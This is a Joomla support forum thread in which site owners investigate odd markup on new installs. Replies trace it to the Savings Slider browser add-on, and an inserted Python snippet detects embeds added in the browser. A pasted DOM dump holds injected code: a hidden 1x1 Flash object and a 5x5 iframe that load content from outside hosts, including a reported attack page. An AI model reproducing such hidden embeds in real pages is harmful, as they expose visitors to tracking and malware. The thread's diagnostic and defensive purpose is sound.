odd code in new installation of Joomla 2.5.7

Discussion regarding Joomla! 2.5 security issues.

Post by aimlesslady » Wed Oct 17, 2012 5:26 pm

I have several folders with both Joomla 1.5 and 2.5 sites, all using the latest version, on a shared server. My sites keep redirecting to msn.com, both the url for the front end or backend. I removed all files except the log file from the "root" and all the sites are in folders. If it is a live site, the url points directly to it. If it is a site I am still working on, I access it with the sub-domain and the name of the folder. I restored 2 of the sites because I had backups for them, so I just created a new database and folder and restored them. I will change the admin and password and add admin tools, which I hadn't done (and learned my lesson).

I do have one site that I have been working on and had not backed up yet (stupid, I know). I uploaded a clean htaccess file so I don't think the code is in there. So I will probably have to rebuild it from scratch. So I did a fresh installation of Joomla 2.5.7 with a new database in a new folder, and I noticed a strange thing. At the very top of the browser there are some small black squares right above the admin panel on the back end and at the top of the page on the front end. When I use Firebug, I see the following, and it just doesn't seem right. This is a new install without sample data.

Code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-gb" dir="ltr" xml:lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" slick-uniqueid="3">
<head>
<body style="font-size: 100%;">
<div id="_GPL_e6a00_parent_div" style="position: absolute; top: 0px; left: 0px; width: 1px; height: 1px; z-index: 2147483647;">
<object id="_GPL_e6a00_swf" width="1" height="1" type="application/x-shockwave-flash" data="http://savingsslider-a.akamaihd.net/items/e6a00/storage.swf">
<param name="wmode" value="transparent">
<param name="allowscriptaccess" value="always">
<param name="flashvars" value="logfn=_GPL.items.e6a00.log&onload=_GPL.items.e6a00.onload&onerror=_GPL.items.e6a00.onerror&LSOName=gpl">
</object>
</div>
<iframe width="5" scrolling="auto" height="5" align="middle" frameborder="no" src="http://polarizebit.org/Lexmark?8">
<!DOCTYPE html>
<html class="blacklist" xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" href="chrome://global/skin/netError.css" type="text/css" media="all">
Filtered chrome url chrome://global/skin/netError.css
</link>
<link id="favicon" rel="icon" type="image/png" href="chrome://global/skin/icons/blacklist_favicon.png"/>
<script type="application/javascript">
// Error url MUST be formatted like this:
// about:blocked?e=error_code&u=url
// Note that this file uses document.documentURI to get
// the URL (with the format from above). This is because
// document.location.href gets the current URI off the docshell,
// which is the URL displayed in the location bar, i.e.
// the URI that the user attempted to load.
function getErrorCode()
{
var url = document.documentURI;
var error = url.search(/e\=/);
var duffUrl = url.search(/\&u\=/);
return decodeURIComponent(url.slice(error + 2, duffUrl));
}
function getURL()
{
var url = document.documentURI;
var match = url.match(/&u=([^&]+)&/);
// match == null if not found; if so, return an empty string
// instead of what would turn out to be portions of the URI
if (!match)
return "";
url = decodeURIComponent(match[1]);
// If this is a view-source page, then get then real URI of the page
if (/^view-source\:/.test(url))
url = url.slice(12);
return url;
}
/**
* Attempt to get the hostname via document.location. Fail back
* to getURL so that we always return something meaningful.
*/
function getHostString()
{
try {
return document.location.hostname;
} catch (e) {
return getURL();
}
}
function initPage()
{
// Handoff to the appropriate initializer, based on error code
switch (getErrorCode()) {
case "malwareBlocked" :
initPage_malware();
break;
case "phishingBlocked" :
initPage_phishing();
break;
}
}
/**
* Initialize custom strings and functionality for blocked malware case
*/
function initPage_malware()
{
// Remove phishing strings
var el = document.getElementById("errorTitleText_phishing");
el.parentNode.removeChild(el);
el = document.getElementById("errorShortDescText_phishing");
el.parentNode.removeChild(el);
el = document.getElementById("errorLongDescText_phishing");
el.parentNode.removeChild(el);
// Set sitename
document.getElementById("malware_sitename").textContent = getHostString();
document.title = document.getElementById("errorTitleText_malware")
.innerHTML;
}
/**
* Initialize custom strings and functionality for blocked phishing case
*/
function initPage_phishing()
{
// Remove malware strings
var el = document.getElementById("errorTitleText_malware");
el.parentNode.removeChild(el);
el = document.getElementById("errorShortDescText_malware");
el.parentNode.removeChild(el);
el = document.getElementById("errorLongDescText_malware");
el.parentNode.removeChild(el);
// Set sitename
document.getElementById("phishing_sitename").textContent = getHostString();
document.title = document.getElementById("errorTitleText_phishing")
.innerHTML;
}
</script>
<style type="text/css">
/* Style warning button to look like a small text link in the
bottom right. This is preferable to just using a text link
since there is already a mechanism in browser.js for trapping
oncommand events from unprivileged chrome pages (BrowserOnCommand).*/
#ignoreWarningButton {
-moz-appearance: none;
background: transparent;
border: none;
color: white; /* Hard coded because netError.css forces this page's background to dark red */
text-decoration: underline;
margin: 0;
padding: 0;
position: relative;
top: 23px;
left: 20px;
font-size: smaller;
}
#ignoreWarning {
text-align: right;
}
</style>
<title>Reported Attack Page!</title>
</head>
<body dir="ltr">
<div id="errorPageContainer">
<div id="errorTitle">
<h1 id="errorTitleText_malware">Reported Attack Page!</h1>
</div>
<div id="errorLongContent">
<div id="errorShortDesc">
<div id="errorLongDesc">
<div id="buttons">
</div>
<div id="ignoreWarning">
</div>
<script type="application/javascript">
</body>
</html>
</iframe>



Is this normal? Do you think it is related to the redirect? Where is it coming from? How can I fix this?
The new install is http://s285641334.onlinehome.us/olio2/

The site that redirects to msn.com is http://s285641334.onlinehome.us/olio/

Someone please help!!!
Ellen

Post by Tarufeti » Wed Oct 17, 2012 9:11 pm

I have the same problem. Can someone help?

Post by aimlesslady » Wed Oct 17, 2012 10:03 pm

Maybe this helps....

Forum Post Assistant (v1.2.3) : 17th October 2012 wrote:
Basic Environment ::
Joomla! Instance :: Joomla! 2.5.7-Stable (Ember) 13-September-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Writable (644) | Owner: u53517304 (uid: 1/gid: 1) | Group: ftpusers (gid: 1) | Valid For: 2.5
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: none | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux infong 2.4 #1 SMP Fri May 18 17:32:59 UTC 2012 i686 GNU/Linux | OS Version: Linux infong 2.4 #1 SMP Fri May 18 17:32:59 UTC 2012 i686 GNU/Linux | Technology: Linux infong 2.4 #1 SMP Fri May 18 17:32:59 UTC 2012 i686 GNU/Linux | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /kunden/homepages/35/d285641313/htdocs | System TMP Writable: Yes

PHP Configuration :: Version: 5.4.7 | PHP API: cgi-fcgi | Session Path Writable: Unknown | Display Errors: 1 | Error Reporting: 22519 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 40M | Max. POST Size: 8M | Max. Input Time: -1 | Max. Execution Time: 50000 | Memory Limit: 90M

MySQL Configuration :: Version: 5.0.91-log (Client:mysqlnd 5.0.10 - 20111026 - $Id: b0b3b15c693b7f6aeb3aa66b646fee339f175e39 $) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 622.27 KiB | #of Tables: 83
Detailed Environment ::
PHP Extensions :: Core (5.4.7) | date (5.4.7) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7) | zlib (2.0) | bcmath () | bz2 () | calendar () | ctype () | curl () | dba () | dom (20031129) | hash (1.0) | fileinfo (1.0.5) | filter (0.11.0) | ftp () | gd () | gettext () | SPL (0.2) | iconv () | session () | intl (1.1.0) | json (1.2.1) | mbstring () | mcrypt () | standard (5.4.7) | mysqlnd (mysqlnd 5.0.10 - 20111026 - $Id: b0b3b15c693b7f6aeb3aa66b646fee339f175e39 $) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | Phar (2.0.1) | posix () | Reflection ($Id: 7c9981924ded1ad2023fb1d5c3d1a8f290632f5c $) | imap () | shmop () | SimpleXML (0.1) | soap () | mysqli (0.1) | exif (1.4 $Id$) | tidy (2.0) | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | mysql (1.0) | cgi-fcgi () | mhash () | Zend Engine (2.4.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions ::
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) ::
Extensions Discovered ::
Components :: SITE :: WF_AGGREGATOR_VIMEO_TITLE (2.2.8.3) | [youtube] (2.2.8.3) | WF_FILESYSTEM_JOOMLA_TITLE (2.2.8.3) | WF_LINKS_JOOMLALINKS_TITLE (2.2.8.3) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.2.8.3) | WF_POPUPS_JCEMEDIABOX_TITLE (2.2.8.3) | WF_POPUPS_WINDOW_TITLE (2.2.8.3) | WF_LINK_SEARCH_TITLE (2.2.8.3) | WF_ANCHOR_TITLE (2.2.8.3) | WF_ARTICLE_TITLE (2.2.8.3) | WF_AUTOSAVE_TITLE (2.2.8.3) | WF_BROWSER_TITLE (2.2.8.3) | WF_CAPTION_TITLE (2.0.3) | WF_CLEANUP_TITLE (2.2.8.3) | WF_CLIPBOARD_TITLE (2.2.8.3) | WF_CONTEXTMENU_TITLE (2.2.8.3) | WF_DIRECTIONALITY_TITLE (2.2.8.3) | WF_FULLSCREEN_TITLE (2.2.8.3) | WF_IMGMANAGER_TITLE (2.2.8.3) | WF_INLINEPOPUPS_TITLE (2.2.8.3) | [Do not buy our kitchens!] (2.2.8.3) | WF_LAYER_TITLE (2.2.8.3) | WF_LINK_TITLE (2.2.8.3) | WF_MEDIA_TITLE (2.2.8.3) | WF_MEDIAMANAGER_TITLE (2.0.7) | WF_NONBREAKING_TITLE (2.2.8.3) | WF_PREVIEW_TITLE (2.2.8.3) | WF_PRINT_TITLE (2.2.8.3) | WF_SEARCHREPLACE_TITLE (2.2.8.3) | WF_SOURCE_TITLE (2.2.8.3) | WF_SPELLCHECKER_TITLE (2.2.8.3) | WF_STYLE_TITLE (2.2.8.3) | WF_TABLE_TITLE (2.2.8.3) | WF_TEXTCASE_TITLE (2.2.8.3) | WF_VISUALBLOCKS_TITLE (2.2.8.3) | WF_VISUALCHARS_TITLE (2.2.8.3) | WF_XHTMLXTRAS_TITLE (2.2.8.3) | com_mailto (2.5.0) | com_wrapper (2.5.0) |
Components :: ADMIN :: com_admin (2.5.0) | Akeeba (3.6.7) | com_banners (2.5.0) | com_cache (2.5.0) | com_categories (2.5.0) | com_checkin (2.5.0) | com_config (2.5.0) | com_content (2.5.0) | com_cpanel (2.5.0) | eXtplorer (2.1.0RC5) | com_finder (2.5.0) | com_installer (2.5.0) | JCE (2.2.8.3) | Unknown (-) | Editor - JCE (2.2.8.3) | Editor - JCE (2.2.8.3) | JCE File Browser (2.0.0) | plg_quickicon_jcefilebrowser (2.5.0) | com_joomlaupdate (2.5.0) | com_languages (2.5.0) | com_login (2.5.0) | com_media (2.5.0) | com_menus (2.5.0) | com_messages (2.5.0) | com_modules (2.5.0) | Content - Multicategories (1.0.0) | Button - Multicategories (1.0.0) | COM_MULTICATEGORIES (1.0.2) | com_newsfeeds (2.5.0) | COM_OSTOOLBAR (1.5.7) | com_plugins (2.5.0) | com_redirect (2.5.0) | RSForm (1.4.0 R43) | com_search (2.5.0) | com_templates (2.5.0) | com_users (2.5.0) | com_weblinks (2.5.0) | Widgetkit (1.2.2) | com_xmap (2.2.1) |

Modules :: SITE :: mod_articles_archive (2.5.0) | mod_articles_categories (2.5.0) | mod_articles_category (2.5.0) | mod_articles_latest (2.5.0) | mod_articles_news (2.5.0) | mod_articles_popular (2.5.0) | mod_banners (2.5.0) | mod_breadcrumbs (2.5.0) | mod_custom (2.5.0) | mod_feed (2.5.0) | mod_finder (2.5.0) | mod_footer (2.5.0) | mod_languages (2.5.0) | mod_login (2.5.0) | mod_menu (2.5.0) | mod_random_image (2.5.0) | mod_related_items (2.5.0) | RSForm! Pro Module (1.3.0) | mod_search (2.5.0) | mod_stats (2.5.0) | mod_syndicate (2.5.0) | mod_users_latest (2.5.0) | mod_weblinks (2.5.0) | mod_whosonline (2.5.0) | Widgetkit (1.0.0) | Widgetkit Twitter (1.0.0) | mod_wrapper (2.5.0) |
Modules :: ADMIN :: mod_custom (2.5.0) | mod_feed (2.5.0) | mod_latest (2.5.0) | mod_logged (2.5.0) | mod_login (2.5.0) | mod_menu (2.5.0) | mod_multilangstatus (2.5.0) | mod_popular (2.5.0) | mod_quickicon (2.5.0) | mod_status (2.5.0) | mod_submenu (2.5.0) | mod_title (2.5.0) | mod_toolbar (2.5.0) | mod_version (2.5.0) |

Plugins :: SITE :: plg_authentication_gmail (2.5.0) | plg_authentication_joomla (2.5.0) | plg_authentication_ldap (2.5.0) | plg_captcha_recaptcha (2.5.0) | plg_content_emailcloak (2.5.0) | plg_content_finder (2.5.0) | plg_content_geshi (2.5.0) | plg_content_joomla (2.5.0) | plg_content_loadmodule (2.5.0) | Content - Multicategories (1.0.0) | plg_content_pagebreak (2.5.0) | plg_content_pagenavigation (2.5.0) | plg_content_vote (2.5.0) | Content - Widgetkit (1.0.0) | plg_editors_codemirror (1.0) | Editor - JCE (2.2.8.3) | plg_editors_tinymce (3.5.4.1) | plg_editors-xtd_article (2.5.0) | PLG_EDITORS-XTD_ARTICLESANYWHE (1.13.5) | plg_editors-xtd_image (2.5.0) | Button - Multicategories (1.0.0) | plg_editors-xtd_pagebreak (2.5.0) | plg_editors-xtd_readmore (2.5.0) | plg_extension_joomla (2.5.0) | plg_finder_categories (2.5.0) | plg_finder_contacts (2.5.0) | plg_finder_content (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_weblinks (2.5.0) | PLG_JMONITORING_AKEEBABACKUP_T (1.0) | plg_quickicon_extensionupdate (2.5.0) | plg_quickicon_jcefilebrowser (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_search_categories (2.5.0) | plg_search_contacts (2.5.0) | plg_search_content (2.5.0) | plg_search_newsfeeds (2.5.0) | plg_search_weblinks (2.5.0) | PLG_SYSTEM_ARTICLESANYWHERE (1.13.5) | plg_system_cache (2.5.0) | plg_system_debug (2.5.0) | plg_system_highlight (2.5.0) | System - JCE MediaBox (1.1.4) | plg_system_languagecode (2.5.0) | plg_system_languagefilter (2.5.0) | plg_system_log (2.5.0) | plg_system_logout (2.5.0) | PLG_SYSTEM_NNFRAMEWORK (12.1.3) | plg_system_p3p (2.5.0) | plg_system_redirect (2.5.0) | plg_system_remember (2.5.0) | plg_system_sef (2.5.0) | System - Widgetkit Joomla (1.0.0) | System - Widgetkit (1.0.0) | System - Widgetkit ZOO (1.0.0) | plg_user_contactcreator (2.5.0) | plg_user_joomla (2.5.0) | plg_user_profile (2.5.0) | Xmap - Content Plugin (2.0.3) | Xmap - Kunena Plugin (2.0.2) | Xmap - Mosets Tree Plugin (2.0.2) | Xmap - SobiPro Plugin (2.0.1) 
| Xmap - Virtuemart Plugin (2.0.0) | Xmap - WebLinks Plugin (2.0) |
Templates Discovered ::
Templates :: SITE :: atomic (2.5.0) | beez5 (2.5.0) | beez_20 (2.5.0) | yoo_master (1.0.0) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |

Post by raydesign » Sat Nov 03, 2012 7:29 pm

Any news on this matter?
I have the same issue on several sites.

Post by mandville » Sat Nov 03, 2012 9:28 pm

please go through the sticky - before you post read this and security checklist 7

hackers seldom redirect to msn as it does not give them any profit or fame

Post by kenmcd » Wed Nov 07, 2012 7:04 am

This is most likely a problem in the user's browser, not in Joomla.
I see no such code in Firefox, Opera, or IE.

The SWF file being loaded (storage.swf) is part of SwfStore (uses JavaScript to store info in LSOs, "Flash-cookies").
SwfStore is commonly used by various nefarious folks such as sleazy browser toolbars and advertising networks.

The link to the file provides a clue:
h##p://savingsslider-a.akamaihd.net/items/e6a00/storage.swf

Savings Slider is a browser add-on to "help" you shop with coupons.

Remove the offending toolbar and/or other extensions and the issue should go away.

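
The diagnosis in the reply above depends on the markup being added inside the visitor's browser rather than sent by the server. As an added example (not part of the thread), this Python check compares the HTML a non-browser client receives with the DOM the browser shows and lists off-site embeds that exist only in the DOM. The function names and both HTML samples are constructed for illustration; the two URLs are the ones in the Firebug dump from the first post.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Elements that pull in external content, and the attribute holding the URL.
EMBED_ATTRS = {"iframe": "src", "script": "src", "object": "data", "embed": "src"}

class EmbedCollector(HTMLParser):
    """Collect (tag, url) pairs for every element that loads a resource."""
    def __init__(self):
        super().__init__()
        self.found = set()

    def handle_starttag(self, tag, attrs):
        attr = EMBED_ATTRS.get(tag)
        url = dict(attrs).get(attr) if attr else None
        if url:
            self.found.add((tag, url))

def embeds(html):
    collector = EmbedCollector()
    collector.feed(html)
    return collector.found

def client_side_only(server_html, dom_html, site_host):
    """Off-site embeds in the rendered DOM that the server never sent."""
    extra = embeds(dom_html) - embeds(server_html)
    return sorted((tag, url) for tag, url in extra
                  if urlparse(url).hostname not in (None, site_host))

# Constructed sample: what a non-browser client receives from a clean install.
SERVER_HTML = """<html><head>
<script src="/media/system/js/mootools-core.js"></script>
</head><body><div id="content"></div></body></html>"""

# Constructed sample of the browser's DOM; the two URLs are the ones in the
# Firebug dump from the first post.
DOM_HTML = """<html><head>
<script src="/media/system/js/mootools-core.js"></script>
</head><body>
<div id="_GPL_e6a00_parent_div">
<object id="_GPL_e6a00_swf" data="http://savingsslider-a.akamaihd.net/items/e6a00/storage.swf"></object>
</div>
<iframe width="5" height="5" src="http://polarizebit.org/Lexmark?8"></iframe>
<div id="content"></div></body></html>"""

if __name__ == "__main__":
    for tag, url in client_side_only(SERVER_HTML, DOM_HTML, "s285641334.onlinehome.us"):
        print(f"added in the browser, not sent by the server: <{tag}> {url}")
```

A clean server copy only clears the server for that one request: fetch it with the same User-Agent and Referer the browser sends, since injected server-side code can vary its output by them.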

Post by ahwoogamac » Mon Nov 26, 2012 9:42 pm

Kenmcd is right on. Same thing happened to me. Then I looked in Chrome's Extensions and found this:

Savings-Slider 2.3
Savings-Slider will help you save money when shopping online. When alerted that there are coupons available, simply click on "View All Available Coupons" for all the deals on the site you're browsing. Click the coupon to apply automatically! Savings-Slider is ad-supported software that is provided at no cost and may display advertisements in websites as you view them.
http://www.planetbobstudios.com
